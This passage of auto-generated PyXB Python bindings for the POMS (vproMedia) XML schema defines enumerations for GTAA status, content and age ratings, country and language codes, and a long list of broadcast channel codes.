Namespace.addCategoryObject('typeBinding', 'geoRestrictionEnum', geoRestrictionEnum)
_module_typeBindings.geoRestrictionEnum = geoRestrictionEnum
# Atomic simple type: {urn:vpro:media:2009}gtaaStatusType
class gtaaStatusType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'gtaaStatusType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1067, 2)
_Documentation = None
gtaaStatusType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=gtaaStatusType, enum_prefix=None)
gtaaStatusType.candidate = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='candidate', tag='candidate')
gtaaStatusType.approved = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='approved', tag='approved')
gtaaStatusType.redirected = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='redirected', tag='redirected')
gtaaStatusType.not_compliant = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='not_compliant', tag='not_compliant')
gtaaStatusType.rejected = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='rejected', tag='rejected')
gtaaStatusType.obsolete = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='obsolete', tag='obsolete')
gtaaStatusType.deleted = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='deleted', tag='deleted')
gtaaStatusType._InitializeFacetMap(gtaaStatusType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'gtaaStatusType', gtaaStatusType)
_module_typeBindings.gtaaStatusType = gtaaStatusType
# Atomic simple type: {urn:vpro:media:2009}contentRatingType
class contentRatingType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'contentRatingType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1080, 2)
_Documentation = None
contentRatingType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=contentRatingType, enum_prefix=None)
contentRatingType.DISCRIMINATIE = contentRatingType._CF_enumeration.addEnumeration(unicode_value='DISCRIMINATIE', tag='DISCRIMINATIE')
contentRatingType.GROF_TAALGEBRUIK = contentRatingType._CF_enumeration.addEnumeration(unicode_value='GROF_TAALGEBRUIK', tag='GROF_TAALGEBRUIK')
contentRatingType.ANGST = contentRatingType._CF_enumeration.addEnumeration(unicode_value='ANGST', tag='ANGST')
contentRatingType.GEWELD = contentRatingType._CF_enumeration.addEnumeration(unicode_value='GEWELD', tag='GEWELD')
contentRatingType.SEKS = contentRatingType._CF_enumeration.addEnumeration(unicode_value='SEKS', tag='SEKS')
contentRatingType.DRUGS_EN_ALCOHOL = contentRatingType._CF_enumeration.addEnumeration(unicode_value='DRUGS_EN_ALCOHOL', tag='DRUGS_EN_ALCOHOL')
contentRatingType._InitializeFacetMap(contentRatingType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'contentRatingType', contentRatingType)
_module_typeBindings.contentRatingType = contentRatingType
# Atomic simple type: {urn:vpro:media:2009}ageRatingType
class ageRatingType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ageRatingType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1127, 2)
_Documentation = None
ageRatingType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=ageRatingType, enum_prefix=None)
ageRatingType.n6 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='6', tag='n6')
ageRatingType.n9 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='9', tag='n9')
ageRatingType.n12 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='12', tag='n12')
ageRatingType.n14 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='14', tag='n14')
ageRatingType.n16 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='16', tag='n16')
ageRatingType.n18 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='18', tag='n18')
ageRatingType.ALL = ageRatingType._CF_enumeration.addEnumeration(unicode_value='ALL', tag='ALL')
ageRatingType.NOT_YET_RATED = ageRatingType._CF_enumeration.addEnumeration(unicode_value='NOT_YET_RATED', tag='NOT_YET_RATED')
ageRatingType._InitializeFacetMap(ageRatingType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'ageRatingType', ageRatingType)
_module_typeBindings.ageRatingType = ageRatingType
# Atomic simple type: {urn:vpro:media:2009}countryCodeType
class countryCodeType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'countryCodeType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1196, 2)
_Documentation = None
countryCodeType._CF_pattern = pyxb.binding.facets.CF_pattern()
countryCodeType._CF_pattern.addPattern(pattern='(\\w){2,4}')
countryCodeType._InitializeFacetMap(countryCodeType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'countryCodeType', countryCodeType)
_module_typeBindings.countryCodeType = countryCodeType
# Atomic simple type: {urn:vpro:media:2009}languageCodeType
class languageCodeType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'languageCodeType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1216, 2)
_Documentation = None
languageCodeType._CF_pattern = pyxb.binding.facets.CF_pattern()
languageCodeType._CF_pattern.addPattern(pattern='(\\w){2,4}')
languageCodeType._InitializeFacetMap(languageCodeType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'languageCodeType', languageCodeType)
_module_typeBindings.languageCodeType = languageCodeType
# Atomic simple type: {urn:vpro:media:2009}channelEnum
class channelEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'channelEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1228, 2)
_Documentation = None
channelEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=channelEnum, enum_prefix=None)
channelEnum.NED1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='NED1', tag='NED1')
channelEnum.NED2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='NED2', tag='NED2')
channelEnum.NED3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='NED3', tag='NED3')
channelEnum.NEDE = channelEnum._CF_enumeration.addEnumeration(unicode_value='NEDE', tag='NEDE')
channelEnum.RTL4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTL4', tag='RTL4')
channelEnum.RTL5 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTL5', tag='RTL5')
channelEnum.SBS6 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SBS6', tag='SBS6')
channelEnum.RTL7 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTL7', tag='RTL7')
channelEnum.VERO = channelEnum._CF_enumeration.addEnumeration(unicode_value='VERO', tag='VERO')
channelEnum.NET5 = channelEnum._CF_enumeration.addEnumeration(unicode_value='NET5', tag='NET5')
channelEnum.RTL8 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTL8', tag='RTL8')
channelEnum.REGI = channelEnum._CF_enumeration.addEnumeration(unicode_value='REGI', tag='REGI')
channelEnum.OFRY = channelEnum._CF_enumeration.addEnumeration(unicode_value='OFRY', tag='OFRY')
channelEnum.NOOR = channelEnum._CF_enumeration.addEnumeration(unicode_value='NOOR', tag='NOOR')
channelEnum.RTVD = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTVD', tag='RTVD')
channelEnum.OOST = channelEnum._CF_enumeration.addEnumeration(unicode_value='OOST', tag='OOST')
channelEnum.GELD = channelEnum._CF_enumeration.addEnumeration(unicode_value='GELD', tag='GELD')
channelEnum.FLEV = channelEnum._CF_enumeration.addEnumeration(unicode_value='FLEV', tag='FLEV')
channelEnum.BRAB = channelEnum._CF_enumeration.addEnumeration(unicode_value='BRAB', tag='BRAB')
channelEnum.REGU = channelEnum._CF_enumeration.addEnumeration(unicode_value='REGU', tag='REGU')
channelEnum.NORH = channelEnum._CF_enumeration.addEnumeration(unicode_value='NORH', tag='NORH')
channelEnum.WEST = channelEnum._CF_enumeration.addEnumeration(unicode_value='WEST', tag='WEST')
channelEnum.RIJN = channelEnum._CF_enumeration.addEnumeration(unicode_value='RIJN', tag='RIJN')
channelEnum.L1TV = channelEnum._CF_enumeration.addEnumeration(unicode_value='L1TV', tag='L1TV')
channelEnum.OZEE = channelEnum._CF_enumeration.addEnumeration(unicode_value='OZEE', tag='OZEE')
channelEnum.AT5 = channelEnum._CF_enumeration.addEnumeration(unicode_value='AT5_', tag='AT5')
channelEnum.RNN7 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RNN7', tag='RNN7')
channelEnum.BVNT = channelEnum._CF_enumeration.addEnumeration(unicode_value='BVNT', tag='BVNT')
channelEnum.EEN = channelEnum._CF_enumeration.addEnumeration(unicode_value='EEN_', tag='EEN')
channelEnum.KETN = channelEnum._CF_enumeration.addEnumeration(unicode_value='KETN', tag='KETN')
channelEnum.VTM = channelEnum._CF_enumeration.addEnumeration(unicode_value='VTM_', tag='VTM')
channelEnum.KA2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='KA2_', tag='KA2')
channelEnum.VT4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='VT4_', tag='VT4')
channelEnum.LUNE = channelEnum._CF_enumeration.addEnumeration(unicode_value='LUNE', tag='LUNE')
channelEnum.LDUE = channelEnum._CF_enumeration.addEnumeration(unicode_value='LDUE', tag='LDUE')
channelEnum.RTBF = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTBF', tag='RTBF')
channelEnum.ARD = channelEnum._CF_enumeration.addEnumeration(unicode_value='ARD_', tag='ARD')
channelEnum.ZDF = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZDF_', tag='ZDF')
channelEnum.WDR = channelEnum._CF_enumeration.addEnumeration(unicode_value='WDR_', tag='WDR')
channelEnum.N_3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='N_3_', tag='N_3')
channelEnum.SUDW = channelEnum._CF_enumeration.addEnumeration(unicode_value='SUDW', tag='SUDW')
channelEnum.SWF = channelEnum._CF_enumeration.addEnumeration(unicode_value='SWF_', tag='SWF')
channelEnum.RTL = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTL_', tag='RTL')
channelEnum.SAT1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SAT1', tag='SAT1')
channelEnum.PRO7 = channelEnum._CF_enumeration.addEnumeration(unicode_value='PRO7', tag='PRO7')
channelEnum.n3SAT = channelEnum._CF_enumeration.addEnumeration(unicode_value='3SAT', tag='n3SAT')
channelEnum.KABE = channelEnum._CF_enumeration.addEnumeration(unicode_value='KABE', tag='KABE')
channelEnum.ARTE = channelEnum._CF_enumeration.addEnumeration(unicode_value='ARTE', tag='ARTE')
channelEnum.ART = channelEnum._CF_enumeration.addEnumeration(unicode_value='ART', tag='ART')
channelEnum.T5ME = channelEnum._CF_enumeration.addEnumeration(unicode_value='T5ME', tag='T5ME')
channelEnum.FRA2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FRA2', tag='FRA2')
channelEnum.FRA3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FRA3', tag='FRA3')
channelEnum.BBC1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBC1', tag='BBC1')
channelEnum.BBC2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBC2', tag='BBC2')
channelEnum.BBTH = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBTH', tag='BBTH')
channelEnum.BBTC = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBTC', tag='BBTC')
channelEnum.BBCF = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBCF', tag='BBCF')
channelEnum.BBFC = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBFC', tag='BBFC')
channelEnum.BBCP = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBCP', tag='BBCP')
channelEnum.TRTI = channelEnum._CF_enumeration.addEnumeration(unicode_value='TRTI', tag='TRTI')
channelEnum.SHOW = channelEnum._CF_enumeration.addEnumeration(unicode_value='SHOW', tag='SHOW')
channelEnum.LIGT = channelEnum._CF_enumeration.addEnumeration(unicode_value='LIGT', tag='LIGT')
channelEnum.TURK = channelEnum._CF_enumeration.addEnumeration(unicode_value='TURK', tag='TURK')
channelEnum.ATVT = channelEnum._CF_enumeration.addEnumeration(unicode_value='ATVT', tag='ATVT')
channelEnum.FOXT = channelEnum._CF_enumeration.addEnumeration(unicode_value='FOXT', tag='FOXT')
channelEnum.HABN = channelEnum._CF_enumeration.addEnumeration(unicode_value='HABN', tag='HABN')
channelEnum.STTV = channelEnum._CF_enumeration.addEnumeration(unicode_value='STTV', tag='STTV')
channelEnum.RRTM = channelEnum._CF_enumeration.addEnumeration(unicode_value='RRTM', tag='RRTM')
channelEnum.RMBC = channelEnum._CF_enumeration.addEnumeration(unicode_value='RMBC', tag='RMBC')
channelEnum.RART = channelEnum._CF_enumeration.addEnumeration(unicode_value='RART', tag='RART')
channelEnum.ARTM = channelEnum._CF_enumeration.addEnumeration(unicode_value='ARTM', tag='ARTM')
channelEnum.TVBS = channelEnum._CF_enumeration.addEnumeration(unicode_value='TVBS', tag='TVBS')
channelEnum.ASIA = channelEnum._CF_enumeration.addEnumeration(unicode_value='ASIA', tag='ASIA')
channelEnum.TIVI = channelEnum._CF_enumeration.addEnumeration(unicode_value='TIVI', tag='TIVI')
channelEnum.B4UM = channelEnum._CF_enumeration.addEnumeration(unicode_value='B4UM', tag='B4UM')
channelEnum.PCNE = channelEnum._CF_enumeration.addEnumeration(unicode_value='PCNE', tag='PCNE')
channelEnum.PATN = channelEnum._CF_enumeration.addEnumeration(unicode_value='PATN', tag='PATN')
channelEnum.ZEET = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZEET', tag='ZEET')
channelEnum.ZEEC = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZEEC', tag='ZEEC')
channelEnum.TVE = channelEnum._CF_enumeration.addEnumeration(unicode_value='TVE_', tag='TVE')
channelEnum.RAI = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAI_', tag='RAI')
channelEnum.RAID = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAID', tag='RAID')
channelEnum.RAIT = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAIT', tag='RAIT')
channelEnum.TEVE = channelEnum._CF_enumeration.addEnumeration(unicode_value='TEVE', tag='TEVE')
channelEnum.ERTS = channelEnum._CF_enumeration.addEnumeration(unicode_value='ERTS', tag='ERTS')
channelEnum.STV = channelEnum._CF_enumeration.addEnumeration(unicode_value='STV_', tag='STV')
channelEnum.NTV = channelEnum._CF_enumeration.addEnumeration(unicode_value='NTV_', tag='NTV')
channelEnum.TVPO = channelEnum._CF_enumeration.addEnumeration(unicode_value='TVPO', tag='TVPO')
channelEnum.NOSJ = channelEnum._CF_enumeration.addEnumeration(unicode_value='NOSJ', tag='NOSJ')
channelEnum.CULT = channelEnum._CF_enumeration.addEnumeration(unicode_value='CULT', tag='CULT')
channelEnum.n101 = channelEnum._CF_enumeration.addEnumeration(unicode_value='101_', tag='n101')
channelEnum.PO24 = channelEnum._CF_enumeration.addEnumeration(unicode_value='PO24', tag='PO24')
channelEnum.HILV = channelEnum._CF_enumeration.addEnumeration(unicode_value='HILV', tag='HILV')
channelEnum.HOLL = channelEnum._CF_enumeration.addEnumeration(unicode_value='HOLL', tag='HOLL')
channelEnum.GESC = channelEnum._CF_enumeration.addEnumeration(unicode_value='GESC', tag='GESC')
channelEnum.n3VCN = channelEnum._CF_enumeration.addEnumeration(unicode_value='3VCN', tag='n3VCN')
channelEnum.n3VOS = channelEnum._CF_enumeration.addEnumeration(unicode_value='3VOS', tag='n3VOS')
channelEnum.STER = channelEnum._CF_enumeration.addEnumeration(unicode_value='STER', tag='STER')
channelEnum.NCRV = channelEnum._CF_enumeration.addEnumeration(unicode_value='NCRV', tag='NCRV')
channelEnum.OPVO = channelEnum._CF_enumeration.addEnumeration(unicode_value='OPVO', tag='OPVO')
channelEnum.CONS = channelEnum._CF_enumeration.addEnumeration(unicode_value='CONS', tag='CONS')
channelEnum.HUMO = channelEnum._CF_enumeration.addEnumeration(unicode_value='HUMO', tag='HUMO')
channelEnum.ENTE = channelEnum._CF_enumeration.addEnumeration(unicode_value='ENTE', tag='ENTE')
channelEnum.FASH = channelEnum._CF_enumeration.addEnumeration(unicode_value='FASH', tag='FASH')
channelEnum.COMC = channelEnum._CF_enumeration.addEnumeration(unicode_value='COMC', tag='COMC')
channelEnum.TBN = channelEnum._CF_enumeration.addEnumeration(unicode_value='TBN_', tag='TBN')
channelEnum.DISC = channelEnum._CF_enumeration.addEnumeration(unicode_value='DISC', tag='DISC')
channelEnum.ZONE = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZONE', tag='ZONE')
channelEnum.ANPL = channelEnum._CF_enumeration.addEnumeration(unicode_value='ANPL', tag='ANPL')
channelEnum.CLUB = channelEnum._CF_enumeration.addEnumeration(unicode_value='CLUB', tag='CLUB')
channelEnum.NAGE = channelEnum._CF_enumeration.addEnumeration(unicode_value='NAGE', tag='NAGE')
channelEnum.TRAC = channelEnum._CF_enumeration.addEnumeration(unicode_value='TRAC', tag='TRAC')
channelEnum.NGHD = channelEnum._CF_enumeration.addEnumeration(unicode_value='NGHD', tag='NGHD')
channelEnum.WILD = channelEnum._CF_enumeration.addEnumeration(unicode_value='WILD', tag='WILD')
channelEnum.GARU = channelEnum._CF_enumeration.addEnumeration(unicode_value='GARU', tag='GARU')
channelEnum.ZAZA = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZAZA', tag='ZAZA')
channelEnum.FAM7 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FAM7', tag='FAM7')
channelEnum.DTAL = channelEnum._CF_enumeration.addEnumeration(unicode_value='DTAL', tag='DTAL')
channelEnum.SCIE = channelEnum._CF_enumeration.addEnumeration(unicode_value='SCIE', tag='SCIE')
channelEnum.CIVI = channelEnum._CF_enumeration.addEnumeration(unicode_value='CIVI', tag='CIVI')
channelEnum.DIHD = channelEnum._CF_enumeration.addEnumeration(unicode_value='DIHD', tag='DIHD')
channelEnum.HIST = channelEnum._CF_enumeration.addEnumeration(unicode_value='HIST', tag='HIST')
channelEnum.TRAV = channelEnum._CF_enumeration.addEnumeration(unicode_value='TRAV', tag='TRAV')
channelEnum.HETG = channelEnum._CF_enumeration.addEnumeration(unicode_value='HETG', tag='HETG')
channelEnum.GOED = channelEnum._CF_enumeration.addEnumeration(unicode_value='GOED', tag='GOED')
channelEnum.BABY = channelEnum._CF_enumeration.addEnumeration(unicode_value='BABY', tag='BABY')
channelEnum.DH1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='DH1_', tag='DH1')
channelEnum.LITV = channelEnum._CF_enumeration.addEnumeration(unicode_value='LITV', tag='LITV')
channelEnum.LIVE = channelEnum._CF_enumeration.addEnumeration(unicode_value='LIVE', tag='LIVE')
channelEnum.STAR = channelEnum._CF_enumeration.addEnumeration(unicode_value='STAR', tag='STAR')
channelEnum.WEER = channelEnum._CF_enumeration.addEnumeration(unicode_value='WEER', tag='WEER')
channelEnum.REAL = channelEnum._CF_enumeration.addEnumeration(unicode_value='REAL', tag='REAL')
channelEnum.SCIF = channelEnum._CF_enumeration.addEnumeration(unicode_value='SCIF', tag='SCIF')
channelEnum.n13ST = channelEnum._CF_enumeration.addEnumeration(unicode_value='13ST', tag='n13ST')
channelEnum.CARC = channelEnum._CF_enumeration.addEnumeration(unicode_value='CARC', tag='CARC')
channelEnum.NOSN = channelEnum._CF_enumeration.addEnumeration(unicode_value='NOSN', tag='NOSN')
channelEnum.HISH = channelEnum._CF_enumeration.addEnumeration(unicode_value='HISH', tag='HISH')
channelEnum.BRHD = channelEnum._CF_enumeration.addEnumeration(unicode_value='BRHD', tag='BRHD')
channelEnum.FANT = channelEnum._CF_enumeration.addEnumeration(unicode_value='FANT', tag='FANT')
channelEnum.RACW = channelEnum._CF_enumeration.addEnumeration(unicode_value='RACW', tag='RACW')
channelEnum.COMF = channelEnum._CF_enumeration.addEnumeration(unicode_value='COMF', tag='COMF')
channelEnum.DIER = channelEnum._CF_enumeration.addEnumeration(unicode_value='DIER', tag='DIER')
channelEnum.POKE = channelEnum._CF_enumeration.addEnumeration(unicode_value='POKE', tag='POKE')
channelEnum.MNET = channelEnum._CF_enumeration.addEnumeration(unicode_value='MNET', tag='MNET')
channelEnum.VOOM = channelEnum._CF_enumeration.addEnumeration(unicode_value='VOOM', tag='VOOM')
channelEnum.ZONH = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZONH', tag='ZONH')
channelEnum.KPN1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='KPN1', tag='KPN1')
channelEnum.KPN2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='KPN2', tag='KPN2')
channelEnum.KPN3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='KPN3', tag='KPN3')
channelEnum.KPN4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='KPN4', tag='KPN4')
channelEnum.ZIZO = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZIZO', tag='ZIZO')
channelEnum.DVIC = channelEnum._CF_enumeration.addEnumeration(unicode_value='DVIC', tag='DVIC')
channelEnum.DVB1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='DVB1', tag='DVB1')
channelEnum.DVB2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='DVB2', tag='DVB2')
channelEnum.DVB3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='DVB3', tag='DVB3')
channelEnum.NICK = channelEnum._CF_enumeration.addEnumeration(unicode_value='NICK', tag='NICK')
channelEnum.NIJN = channelEnum._CF_enumeration.addEnumeration(unicode_value='NIJN', tag='NIJN')
channelEnum.NIKT = channelEnum._CF_enumeration.addEnumeration(unicode_value='NIKT', tag='NIKT')
channelEnum.NIKH = channelEnum._CF_enumeration.addEnumeration(unicode_value='NIKH', tag='NIKH')
channelEnum.CART = channelEnum._CF_enumeration.addEnumeration(unicode_value='CART', tag='CART')
channelEnum.BOOM = channelEnum._CF_enumeration.addEnumeration(unicode_value='BOOM', tag='BOOM')
channelEnum.CNN = channelEnum._CF_enumeration.addEnumeration(unicode_value='CNN_', tag='CNN')
channelEnum.BBCW = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBCW', tag='BBCW')
channelEnum.EURN = channelEnum._CF_enumeration.addEnumeration(unicode_value='EURN', tag='EURN')
channelEnum.SKNE = channelEnum._CF_enumeration.addEnumeration(unicode_value='SKNE', tag='SKNE')
channelEnum.BLOO = channelEnum._CF_enumeration.addEnumeration(unicode_value='BLOO', tag='BLOO')
channelEnum.CNBC = channelEnum._CF_enumeration.addEnumeration(unicode_value='CNBC', tag='CNBC')
channelEnum.PALJ = channelEnum._CF_enumeration.addEnumeration(unicode_value='PALJ', tag='PALJ')
channelEnum.ALJA = channelEnum._CF_enumeration.addEnumeration(unicode_value='ALJA', tag='ALJA')
channelEnum.FOXN = channelEnum._CF_enumeration.addEnumeration(unicode_value='FOXN', tag='FOXN')
channelEnum.FXNL = channelEnum._CF_enumeration.addEnumeration(unicode_value='FXNL', tag='FXNL')
channelEnum.MTV = channelEnum._CF_enumeration.addEnumeration(unicode_value='MTV_', tag='MTV')
channelEnum.MTV2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='MTV2', tag='MTV2')
channelEnum.HITS = channelEnum._CF_enumeration.addEnumeration(unicode_value='HITS', tag='HITS')
channelEnum.BASE = channelEnum._CF_enumeration.addEnumeration(unicode_value='BASE', tag='BASE')
channelEnum.MTVB = channelEnum._CF_enumeration.addEnumeration(unicode_value='MTVB', tag='MTVB')
channelEnum.TMF = channelEnum._CF_enumeration.addEnumeration(unicode_value='TMF_', tag='TMF')
channelEnum.TMFN = channelEnum._CF_enumeration.addEnumeration(unicode_value='TMFN', tag='TMFN')
channelEnum.TMFP = channelEnum._CF_enumeration.addEnumeration(unicode_value='TMFP', tag='TMFP')
channelEnum.TMFY = channelEnum._CF_enumeration.addEnumeration(unicode_value='TMFY', tag='TMFY')
channelEnum.TVOR = channelEnum._CF_enumeration.addEnumeration(unicode_value='TVOR', tag='TVOR')
channelEnum.VH1E = channelEnum._CF_enumeration.addEnumeration(unicode_value='VH1E', tag='VH1E')
channelEnum.VH1C = channelEnum._CF_enumeration.addEnumeration(unicode_value='VH1C', tag='VH1C')
channelEnum.PERC = channelEnum._CF_enumeration.addEnumeration(unicode_value='PERC', tag='PERC')
channelEnum.MEZZ = channelEnum._CF_enumeration.addEnumeration(unicode_value='MEZZ', tag='MEZZ')
channelEnum.EURO = channelEnum._CF_enumeration.addEnumeration(unicode_value='EURO', tag='EURO')
channelEnum.EUR2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='EUR2', tag='EUR2')
channelEnum.EXTR = channelEnum._CF_enumeration.addEnumeration(unicode_value='EXTR', tag='EXTR')
channelEnum.MOTO = channelEnum._CF_enumeration.addEnumeration(unicode_value='MOTO', tag='MOTO')
channelEnum.SAIL = channelEnum._CF_enumeration.addEnumeration(unicode_value='SAIL', tag='SAIL')
channelEnum.ESPN = channelEnum._CF_enumeration.addEnumeration(unicode_value='ESPN', tag='ESPN')
channelEnum.NASE = channelEnum._CF_enumeration.addEnumeration(unicode_value='NASE', tag='NASE')
channelEnum.SP11 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP11', tag='SP11')
channelEnum.SP12 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP12', tag='SP12')
channelEnum.SP13 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP13', tag='SP13')
channelEnum.SP14 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP14', tag='SP14')
channelEnum.SP15 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP15', tag='SP15')
channelEnum.SP16 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP16', tag='SP16')
channelEnum.SP17 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP17', tag='SP17')
channelEnum.SP18 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SP18', tag='SP18')
channelEnum.S1HD = channelEnum._CF_enumeration.addEnumeration(unicode_value='S1HD', tag='S1HD')
channelEnum.FIL1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FIL1', tag='FIL1')
channelEnum.FIL2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FIL2', tag='FIL2')
channelEnum.FIL3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FIL3', tag='FIL3')
channelEnum.FL11 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FL11', tag='FL11')
channelEnum.FL1P = channelEnum._CF_enumeration.addEnumeration(unicode_value='FL1P', tag='FL1P')
channelEnum.FL12 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FL12', tag='FL12')
channelEnum.FL13 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FL13', tag='FL13')
channelEnum.FLHD = channelEnum._CF_enumeration.addEnumeration(unicode_value='FLHD', tag='FLHD')
channelEnum.MGMM = channelEnum._CF_enumeration.addEnumeration(unicode_value='MGMM', tag='MGMM')
channelEnum.TCM = channelEnum._CF_enumeration.addEnumeration(unicode_value='TCM_', tag='TCM')
channelEnum.HALL = channelEnum._CF_enumeration.addEnumeration(unicode_value='HALL', tag='HALL')
channelEnum.ACNW = channelEnum._CF_enumeration.addEnumeration(unicode_value='ACNW', tag='ACNW')
channelEnum.RHUS = channelEnum._CF_enumeration.addEnumeration(unicode_value='RHUS', tag='RHUS')
channelEnum.PLAY = channelEnum._CF_enumeration.addEnumeration(unicode_value='PLAY', tag='PLAY')
channelEnum.ADUL = channelEnum._CF_enumeration.addEnumeration(unicode_value='ADUL', tag='ADUL')
channelEnum.PSPI = channelEnum._CF_enumeration.addEnumeration(unicode_value='PSPI', tag='PSPI')
channelEnum.HUST = channelEnum._CF_enumeration.addEnumeration(unicode_value='HUST', tag='HUST')
channelEnum.OXMO = channelEnum._CF_enumeration.addEnumeration(unicode_value='OXMO', tag='OXMO')
channelEnum.XM24 = channelEnum._CF_enumeration.addEnumeration(unicode_value='XM24', tag='XM24')
channelEnum.OU24 = channelEnum._CF_enumeration.addEnumeration(unicode_value='OU24', tag='OU24')
channelEnum.RAD1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD1', tag='RAD1')
channelEnum.RAD2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD2', tag='RAD2')
channelEnum.R2SJ = channelEnum._CF_enumeration.addEnumeration(unicode_value='R2SJ', tag='R2SJ')
channelEnum.RAD3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD3', tag='RAD3')
channelEnum.R3KX = channelEnum._CF_enumeration.addEnumeration(unicode_value='R3KX', tag='R3KX')
channelEnum.R3AL = channelEnum._CF_enumeration.addEnumeration(unicode_value='R3AL', tag='R3AL')
channelEnum.RAD4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD4', tag='RAD4')
channelEnum.R4CO = channelEnum._CF_enumeration.addEnumeration(unicode_value='R4CO', tag='R4CO')
channelEnum.RAD5 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD5', tag='RAD5')
